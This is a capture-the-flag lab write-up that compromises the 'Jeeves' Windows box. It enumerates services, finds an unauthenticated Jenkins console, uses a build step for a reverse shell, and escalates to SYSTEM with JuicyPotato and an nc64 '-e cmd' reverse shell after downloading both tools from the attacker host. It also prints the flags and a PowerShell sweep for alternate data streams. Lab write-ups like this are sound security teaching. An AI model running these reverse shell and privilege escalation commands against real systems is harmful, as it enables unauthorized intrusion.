Proof of Concept

10.129.1.201

Nmap

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

Information Gathering

Collect host information (nxc writes a hosts entry from the SMB response: OS build, NetBIOS name, domain, signing status)

┌──(kali㉿kali)-[~/Jeeves]
└─$ nxc smb 10.129.1.201 --generate-hosts-file host
SMB         10.129.1.201    445    JEEVES           [*] Windows 10 Build 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
 
┌──(kali㉿kali)-[~/Jeeves]
└─$ cat host
10.129.1.201     JEEVES.Jeeves JEEVES

Add the generated entry to /etc/hosts

┌──(kali㉿kali)-[~/Jeeves]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.1.201     JEEVES.Jeeves JEEVES

Initial Access

Confirm that a web service is running on port 50000. The service nmap labelled ibm-db2 is actually HTTP; the 404 on / is served by Jetty, which points to a Java web application.

┌──(kali㉿kali)-[~/Jeeves]
└─$ curl http://jeeves.jeeves:50000
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 404 Not Found</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /. Reason:
<pre>    Not Found</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.z-SNAPSHOT</a><hr/>
 
</body>
</html>

Directory brute-forcing finds /askjeeves. The paths under it (/script, /people/api, /computers/...) are Jenkins endpoints; /askjeeves/script in particular is the Jenkins Script Console.

┌──(kali㉿kali)-[~/Jeeves]
└─$ feroxbuster -u http://jeeves.jeeves:50000/ -t 100 -s 200 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://jeeves.jeeves:50000/
 🚩  In-Scope Url          │ jeeves.jeeves
 🚀  Threads               │ 100
 📖  Wordlist              │ /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[>-------------------] - 2m     46720/2426006 3h      found:0       errors:117
200      GET       14l      558w    12077c http://jeeves.jeeves:50000/askjeeves/script
200      GET       14l      470w    10642c http://jeeves.jeeves:50000/askjeeves/computers/00/markOffline
200      GET       16l      469w    10786c http://jeeves.jeeves:50000/askjeeves/computers/00/index
200      GET        1l        2w      177c http://jeeves.jeeves:50000/askjeeves/people/api/xml
200      GET       82l      916w    12381c http://jeeves.jeeves:50000/askjeeves/people/api/index
200      GET        0l        0w        0c http://jeeves.jeeves:50000/askjeeves/columns/00/config
<SNIP>

Open http://jeeves.jeeves:50000/askjeeves. No login is required to create a job, so go to [ Jenkins > New Item > Freestyle project > Build > Execute Windows batch command ], enter a Windows reverse shell command as the build step, and save.

Start a reverse shell listener, then click "Build Now". Jenkins runs the build step on the server and the reverse shell connects back; the shell lands in the job's workspace directory.

┌──(kali㉿kali)-[~/Jeeves]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.1.201] 49676
 
PS C:\Users\Administrator\.jenkins\workspace\htb>

Read user.txt

PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.1.201
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
 
Tunnel adapter isatap..htb:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Privilege Escalation

Confirm that SeImpersonatePrivilege is enabled for the current user. With that privilege held by a service account, a Potato-family attack can coerce a SYSTEM token and impersonate it.

PS C:\Users\kohsuke\Desktop> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Upload JuicyPotato.exe and nc64.exe to the target, served over HTTP from the attacker machine on port 8000

PS C:\Users\kohsuke\Desktop> iwr -uri http://10.10.14.221:8000/JuicyPotato.exe -OutFile JuicyPotato.exe
PS C:\Users\kohsuke\Desktop> iwr -uri http://10.10.14.221:8000/nc64.exe -OutFile nc64.exe
PS C:\Users\kohsuke\Desktop> dir
 
 
    Directory: C:\Users\kohsuke\Desktop
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/21/2026   7:07 AM         347648 JuicyPotato.exe
-a----        2/21/2026   6:59 AM          45272 nc64.exe
-ar---        11/3/2017  11:22 PM             32 user.txt

Start a second reverse shell listener for the SYSTEM shell

┌──(kali㉿kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...

Run JuicyPotato. -l is the local port its COM listener binds, -p the program to launch, -a that program's arguments, and -t * tells it to try both CreateProcessWithTokenW and CreateProcessAsUser. The default CLSID worked on this Windows 10 build 10586 host; on another build a CLSID of a DCOM server that runs as SYSTEM on that build has to be supplied with -c.

PS C:\Users\kohsuke\Desktop> .\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c C:\Users\kohsuke\Desktop\nc64.exe 10.10.14.221 9999 -e cmd" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

Shell connected as NT AUTHORITY\SYSTEM

┌──(kali㉿kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.1.201] 49705
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system

Find root.txt

C:\Users\Administrator\Desktop contains hm.txt instead of root.txt. dir /a also lists hidden and system files, so the flag is not simply a file with the hidden attribute.

C:\Users\Administrator\Desktop>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
11/03/2017  09:03 PM               282 desktop.ini
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   2,655,916,032 bytes free
               
C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

dir /R lists NTFS alternate data streams, and reveals root.txt stored as a named stream of hm.txt (hm.txt:root.txt:$DATA)

C:\Users\Administrator\Desktop>dir /R
dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,655,854,592 bytes free

Read root.txt. cmd's type cannot open a file:stream path directly, so the stream is read through input redirection with more <.

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
 
C:\Users\Administrator\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.1.201
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
 
Tunnel adapter isatap..htb:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
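The same stream enumeration and read done with PowerShell, as an added example that is not part of the original writeup. It assumes the SYSTEM shell from above and uses the path and stream name that dir /R reported; the Find-AlternateDataStream function and its sweep of C:\Users\Administrator are the example's own generalisation, not a step the author took.

```powershell
# Added example, not from the original writeup: enumerate NTFS alternate data streams
# (ADS) with PowerShell instead of dir /R, then read the stream found above.
# Assumes the SYSTEM shell from the writeup; path and stream name are the ones dir /R showed.
$Desktop = 'C:\Users\Administrator\Desktop'

# Equivalent of "dir /R": list every stream on every file in the directory.
# ':$DATA' is the unnamed default stream (the file's normal content), so it is dropped.
Get-ChildItem -Path $Desktop -File -Force |
    Get-Item -Stream * |
    Where-Object { $_.Stream -ne ':$DATA' } |
    Select-Object FileName, Stream, Length

# Equivalent of "more < hm.txt:root.txt:$DATA"
Get-Content -LiteralPath "$Desktop\hm.txt" -Stream 'root.txt'

# Generalisation (the example's own, not the writeup's): sweep a whole tree for named
# streams so a hidden stream is found without guessing which file carries it.
# Zone.Identifier is the usual benign hit (mark-of-the-web on downloaded files);
# any other named stream deserves a look.
function Find-AlternateDataStream {
    param([Parameter(Mandatory = $true)][string]$Root)

    Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Select-Object FileName, Stream, Length
}

Find-AlternateDataStream -Root 'C:\Users\Administrator'
```

Get-Item -Stream and Get-Content -Stream are dynamic parameters of the FileSystem provider (PowerShell 3.0 and later), so they work on the Windows 10 build in the writeup. Streams only exist on NTFS; copying a file to FAT, to a network share that does not support them, or through a tool that is not stream-aware silently drops them, which is why they are easy to miss during triage and worth sweeping for explicitly.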